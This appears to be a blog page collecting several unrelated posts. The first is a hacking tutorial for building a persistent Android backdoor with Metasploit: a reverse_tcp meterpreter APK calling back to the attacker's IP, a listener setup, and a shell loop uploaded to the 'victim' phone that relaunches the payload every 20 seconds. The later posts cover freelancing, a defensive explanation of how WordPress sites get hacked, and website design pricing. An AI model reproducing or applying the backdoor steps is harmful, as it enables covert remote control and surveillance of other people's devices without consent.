Sunday, 4 June 2017

Create a Persistent Back Door in Android Using Kali Linux:


Fire Up Kali and Hack an Android System:

Use this guide to hack an android system on LAN.
I'll be hacking on WAN, using a VM ware.

After Installing Kali On VM ware..

>> Lets Create a backdoor by typing: 
msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk
  • Now, lets set-up a Listener:
  • msfconsole
  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set LHOST 192.168.0.4
  • exploit
After the User/Victim Installs and opens the abcde.apk, Meterpreter Comes Up...

Step 2Create a Persistent Script:

Here.. Copy these commands in a notepad to create a script, and save it as anything.sh (The file extension .sh is important!)
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
(Don't copy these lines "-----" also, there are no line breaks in the 3rd and the 4th line, they are a single line)
(The first line #!/bin/bash is also important as it recognizes the script as a bash shell script)
(You can set the sleep to any amount of seconds you want the script to sleep)
Move/Copy this to the Home/Root folder of KALI.
--------------------------------------------------------------------------------------------------------
Updated Script v3 (Compatible with any android version)
CRITICAL: DO NOT COPY/PASTE THE SCRIPT DIRECTLY, OR IT (may) WON'T WORK /!\
..I guess, you will have to write it on your own.. (Don't ask me why..)
Code:
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
There is a 'space' between 'while' and ':'
NO Multiple spaces in the script.
NO Line Break between 3rd and 4th line. (So a total of 5 lines)

Step 3Upload It to the Hacked Android System:

You need to upload the shell script to etc/init.d/ so that it is persistent even after Reboot!
To do this, navigate to the directory using the following commands:
  • cd /
Now you should be in the ROOT directory, you can check by typing:
  • ls
Now type:
  • cd etc
Check again by typing:
  • ls
Again change directory:
  • cd init.d
  • ls
Here we are...

Time to Upload the Shell Script:

Do this by typing:
  • upload anything.sh
What the? No! We need Root Access to complete this command! Darn!

Never-Mind:

> Lets just make the application (i.e. Main Activity) persistent until Reboot
> However, it will not be persistent after the android system on the Victim goes for a Reboot.
> To do this upload the script anywhere in the sdcard:
  • cd /
  • cd /sdcard/Download
  • ls
  • upload anything.sh
Done! Uploaded!

Step 4Execute the Script:

Now, all we have to do is execute the script once, and then everything will be done by the script automatically.
Drop into the system's shell by typing:
  • shell
Now, navigate to the location of the script:
  • cd /
  • cd /sdcard/Download
  • ls
Now its time for EXECUTION. Type:
  • sh anything.sh
The script has been Activated! All you have to do is press ctrl+C to terminate the shell (Don't worry the script is still running)
Reboot to eliminate the script or use Task Killer

Step 5Testing...

You can test it by exiting from meterpreter and again setting up a Listener.
You should get a meterpreter prompt automatically!
PROOF:
Wow! It happened so Fast that 3 sessions got opened one after another.
(Tested it on WAN, it works Fine )

The END:

Yes! Finally a persistent backdoor has been created successfully for Android systems.

Things to Remember:

  • The persistence of the backdoor will only remain until a reboot of the android system.
  • If you are hacking on WAN and you have a dynamic Public IP, then, the persistence will only remain until your router reboots/your IP changes.
  • Remember to reboot the android to eliminate the running script, if you are testing on you own Android System.
  • If the Victim's Android system is Rooted and your Public IP is Static, then:
1)The Persistence will remain forever on WAN!
2)The Persistence will remain forever on LAN Obviously

Monday, 28 April 2014

How to Start Freelancing with No Experience ?


In 2011, the Financial Times (UK) reported a 12% growth in the number of freelancers from 2008. Popular freelance broker site Elance enjoyed consistent growth in past years, with the number of jobs posted rising from around 200,000 in the first quarter of 2012 to 300,000 in the same period in 2013.

In addition to a more flexible work schedule, freelancers tend to be happy. According to the 2012 Freelance Industry Report, 90% of freelancers are happier now than they were before going solo, and nearly half felt no impact from the economic downturn. Perhaps most tellingly, 77% of freelancers were optimistic about their business prospects over the following 12 months.

With freelance work being such an enticing prospect, no one would blame you for giving it some serious thought. However, a common issue is simply not knowing how to start. Fortunately, building a successful freelancing career is easier than it seems — just follow the steps below.

1. Choose Your Craft

Just about everything can be outsourced these days. That's why there's a strong likelihood that the skills on your résumé contain one or more freelancing opportunities.

You may be required to think outside of the box — we're not all graphic designers or programmers. However, you may find that your "secondary" skills can offer up freelancing opportunities. For instance, if you are a strong writer, then you have the potential to develop a freelance writing business.

Don't be paralyzed by a preconception that you do not have the necessary skills or experience — you would be surprised how little experience you need in order to get started. A little faith in your abilities will take you a long way.

2. Create a Brand

If you plan to succeed in the world of freelancing, you will need to create a strong brand that sets you apart from the competition. Your brand is your identity (i.e. your website, blog and social media accounts) and it should clearly communicate your unique selling proposition — what you do that makes you special.

With that in mind, you should narrow down your focus to a specific industry. For instance, as a graphic designer you might choose to do branding work for digital startup businesses only. This form of specialization will make you far more attractive to a specific set of prospective clients and give you a greater chance of success. You can try to cater to all and sundry, but you will probably only provoke indifference.

3. Build a Portfolio and Source Testimonials


The world of freelancing lacks the red tape of the corporate world. Many prospective clients are not concerned with qualifications; they simply want to see what you have done in the past and judge whether it is the right fit for them.

Therefore, if you are good at what you do and can demonstrate your skill through a quality portfolio and positive client testimonials, you have every chance of success. The conundrum, however, is in building a portfolio without experience.

Many freelancers will react to this by picking up the smallest and least lucrative jobs around, but that puts them into a vicious cycle of bargain-basement work. To work for high-paying clients, you need to demonstrate that you are worth big money by doing good work.

So don't be afraid to do pro bono work for the right clients when you are first starting out. The free work you do at this stage can ultimately be priceless when it clearly communicates your worth to future potential clients via an extensive portfolio and glowing testimonials. Also, offering your services at no cost is a gentle introduction into the world of freelancing where you do not feel the pressure of having to deliver a service of requisite value.

4. Start Pitching

You should only seek paying clients when you are able to demonstrate your abilities (and your reputation) with a quality portfolio and testimonials. Once you have done so by working on pro bono jobs, it's time to start pitching.

But whom should you pitch? Well, if you branded yourself correctly then you should know exactlywhom to pitch. By having such a narrow focus, potential clients are far more likely to take you seriously than if you offered a generic service. Businesses want to work with freelancers who seemingly came into existence to serve them specifically — you can create this illusion through specialization.

Potential clients can be found everywhere: from Google to social media to your doorstep. The possibilities are endless.

The two keys to successful pitching are relevance and volume. Only pitch those clients who fit the mold of your brand and pitch a lot of them. Ruth Zive of Marketing Wise, a content marketing firm based in Canada, had a "ten before ten" rule when she first started out as a freelance writer — she would make sure to pitch ten prospective clients before 10 a.m. every working day. Those numbers add up quickly.

5. Play the Odds

Ultimately, securing freelance work is a numbers game — the more prospective clients you contact, the more likely you are to find work. That is the equation you should keep in mind. If you have a reasonable skill set and create a quality brand, there is no reason why you cannot succeed in the world of freelancing like so many others have before you.

How do Hackers get in ?

People that don’t want to worry about the technical side of running a blog must feel helpless when it comes to preventing hackers from entering their website. There’s lots of conflicting and unhelpful advice and what is out there is often technical. This post will try and demystify some of the reasons that hackers get into a site which should help in understanding other sources.
When someone views your blog in their web browser, the following things happen:
  1. The browser asks your host for a file, such as MyPost.html
  2. If the file exists the host sends it. Otherwise it passes the request to your blog software, such as WordPress
  3. WordPress figures out that it’s supposed to show a post called MyPost and loads the content of the post and the comments from the database
  4. WordPress loads the theme for your website and starts executing it in order to generate the HTML page that will be sent to the browser.
  5. As it’s going through the theme it’s also executing plugins and core functions that have hooked into the theme. For example, a plugin might add a link to Twitter after the post. The core of WordPress also adds the sidebars, menu, and the contents of the post itself.
  6. Upon receiving the entire page, the browser starts asking for some of the files referenced in the page such as images, stylesheets, and scripts.

What do hackers change?

Hackers work their evil by adding something else into the page or replacing it entirely. They may add extra links, replace your site with a message, or inject malicious code that is served to the web browser.
It’s helpful to think of a blog engine as having the following components:
web server
+- blog core
|    + Code
|    + Static files
|    +- theme
|       + Code
|       + Static files
|    +- plugins
|       + Code
|       + Static files
|    +- database content
+- other files such as media
A hacker must compromise one or more of the above in order to change your site.
  • They can overwrite code files in the core, theme, or plugin to add links, change the content, or run their code on your server
  • They can change the data in the database so that your blog software silently sends whatever they want to the browser
  • They can change media files or static files such as JavaScript to add their own code. For example, they could inject ads or malware into your web page by changing the JavaScript.

How do they change my site?

There are a few ways hackers get in.
  • Guessing passwords - if hackers can guess your FTP or admin passwords then they can change or add posts, or change theme, core, and plugin files.
  • Trojan horse - the malicious software can be bundled with a theme or a plugin. It could be as simple as the plugin adding a spam link to your site, it could be more complicated like a back door
  • Exploiting a vulnerability - Software is written by humans and subject to mistakes. If the hacker can give the script input it didn’t expect, the results might allow the hacker to change files or the database.

How do you protect yourself?

Once you know how hackers do what they do, the solutions become apparent:
  • Get your themes from reputable sources, such as your CMSes offical site or well known commercial sites
  • Limit the plugins you run, and stick to popular ones. This will limit the ways an attacker can get in, and also make sure your site is faster
  • Check for updates frequently and make sure you update when they become available
  • Choose a strong password for your administration and FTP accounts
  • Scan your site for vulnerabilities, including signing up for Google Webmaster Tools

How Much You Should Pay for a Website Design ?


How Much Should You Pay for Website Design?

How much is this going to cost?

It’s a logical thing to ask, really. Those of us who aren’t rich or famous have a finite amount of money, and we always want to feel like that money is being used in the smartest way possible. We are especially cautious when it comes to paying for something intangible like a website – you can’t hold it in your hand, so how much can it really be worth?
The cost of web design work varies wildly. You could ask for quotes from 10 different designers and receive 10 completely different dollar amounts, ranging from a few hundred dollars to several thousand. How do you decide what amount you’re willing to pay?

Factors That Affect the Price of Website Design

1. The components and features you need.
Never assume that your needs are “simple” or should be cheaper than a designer’s standard rate. Some things look easy but are very complicated, while others seem like a big deal but are very easy to implement. Your site may only consist of a single page, yet that doesn’t mean it’s automatically cheaper than one with 5 or even 100 pages.
The thing is, designers don’t always price by the amount of time something takes. Your doctor can stitch a cut in 10 minutes, but that doesn’t mean it doesn’t require knowledge, skill, and precision. Likewise, we have spent considerable time learning to do what we do. If anyone could do it, we wouldn’t have jobs. Adding things like forums, ecommerce, opt-ins, memberships, and other custom functionality is simply going to cost more money.
2. Your designer’s skill level.
Yes, you can get a website for $150. No, it won’t be the same quality as a website that costs $1500. It’s like the difference between a bicycle and a Lexus. Both will get you where you need to go, but one is decidedly better than the other. Designers who charge more are providing you with expertise you won’t find at a bargain rate – and in most cases, the benefits will definitely outweigh the added costs. If you automatically choose the cheapest option, you risk hiring a designer who sucks. Don’t say I didn’t warn you!
3. How demanding you are as a client.
Oops, I mentioned one of those things no one is supposed to talk about! But in the interest of being honest, I’ll just tell you: If you email or call me 50 times a day, expect a billion tiny revisions, cut into my time with my family, and/or request things outside the scope of our working relationship, it’s going to cost you. Over time, designers learn how to sniff out “difficult” clients pretty easily, but if one sneaks through the gates, we are going to make absolutely sure we are compensated for the extra work. Please remember that designers are people and we (sometimes) have lives away from our computers.

So How Much Should I Pay?

Here are a few questions to ask yourself before deciding on a budget for website design.

For Blogs:

What is the point of my blog? If you blog to share photos and memories with your family and don’t make any money from it, I wouldn’t spend more than a few hundred dollars for a design at the most. Actually I’d probably just grab a free theme and leave it at that. If, however, you make thousands of dollars a year from your blog and need it to do specific things for your visitors, it’s time to increase the budget.
What will I gain from a professional design? Whether you want to attract better advertisers or get featured on big name websites, a professionally designed blog will always outperform a generic one. If you knew that spending $2000 now would earn you 5-6 times that in the next year alone, wouldn’t it make sense to spend the money?
Should I outsource this? Many, many bloggers ask me for a quote, then tell me they’re going to design their own sites to save money. When that happens I usually see one of four results:
  • They waste hours and hours trying to figure out what to do, then the end result still looks awful.
  • They waste hours and hours trying to figure out what to do, then get frustrated and hire someone anyway.
  • They immediately go hire a cheaper designer, then end up hiring me to fix what the designer broke.
  • They pay for another design within a year of the DIY job because it wasn’t what they wanted.
In those situations, all I see is wasted time, money, and/or effort. If you’re a blogger, focus on blogging, especially if that’s how you earn your living. There’s no shame in outsourcing the things that aren’t a good use of your time.
WHAT YOU SHOULD SPEND: Anywhere from a few hundred to a few thousand dollars, depending on the value you would get from a better design. In general, I wouldn’t spend more than $5000 on a blog design unless you have a huge audience and very specialized needs.

For Business Websites:

How important is it to have a website for my business?
 It’s the 21st century, and over 60% of internet users research products and services online before they make a purchase. If your company doesn’t have a website, regardless of what you do or how many employees you have, you are totally missing out. That said, having an ugly, outdated website isn’t going to help you much in the reputation department. It’s easy to tell yourself that any web presence is better than none, but you can certainly lose potential clients or customers if they perceive your brand as “cheap” or out of touch.
What does my website actually do for my business?
 Do people use your website to learn about what you offer? Make appointments? Purchase products? Find your phone number? Two important points about this: (1) If your website doesn’t lead to more business, that’s a problem. And it’s not because the web doesn’t work – it’s because your site doesn’t. (2) If your website does lead to more business, it’s time to ask yourself what could help improve conversion rates or make things easier for clients and customers.
What does my business really need?
 I’ve talked to business owners who are obsessed with things that simply don’t matter. They absolutely must have a menu that pops out a certain way, or they want to push content lower on the page just to make the logo bigger. And while they’re worrying about all those nitpicky details, they’re missing the fact that half their visitors never click beyond the homepage. If you aren’t sure what your business site needs, it’s time to consult with someone who does. Immediately.
WHAT YOU SHOULD SPEND:
 Website designs for businesses are more difficult to price because there are so many factors involved. I would say you should always expect at least several thousand dollars, if not much more than that. Don’t like that answer? Try thinking of your website as an employee (click that link – it’s worth it) and I think you’ll see why you’re getting a bargain no matter what you spend.